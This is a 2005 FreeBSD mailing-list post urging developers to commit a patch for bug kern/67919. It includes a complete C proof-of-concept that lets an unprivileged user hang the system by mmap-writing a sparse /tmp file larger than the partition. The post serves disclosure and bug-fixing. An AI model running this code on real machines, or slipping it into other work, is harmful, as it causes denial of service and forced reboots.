kern/67919: Why nobody take serious to fix this bug?
Cai, Quanqing
caiquanqing at gmail.com
Mon Oct 31 02:59:58 PST 2005
Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html
After I read all messages and related links, I feel so frustrating, why
nobody take serious to fix this bug even we have a patch for it? I can
repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System
goes no response so I have to power cycle it. The patch made by Uwe Doering
actually works well. This bug looks like a security hole to me:( If you guys
don't like this patch, please give out a reason and come out a better patch
or solution.
For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you
have to increase FILELEN to a size greater than your /tmp partition:
===============================================
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/mman.h>
#define FILENAME "/tmp/test" /* where to put the test file */
#define FILELEN 710 /* test file length in MB */
main()
{
int fd;
size_t len;
char *buf, *p, *lim;
len = FILELEN * 1024 * 1024;
if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1)
err(2, "open() failed");
if (ftruncate(fd, len) == -1)
err(2, "ftruncate() failed");
buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
if (buf == MAP_FAILED)
err(2, "mmap() failed");
(void)close(fd);
for (p = buf, lim = p + len; p < lim; p += 4096)
*p = '0';
if (munmap(buf, len) == -1)
err(2, "munmap() failed");
exit(0);
}
===============================================================
Cai, Quanqing
More information about the freebsd-current
mailing list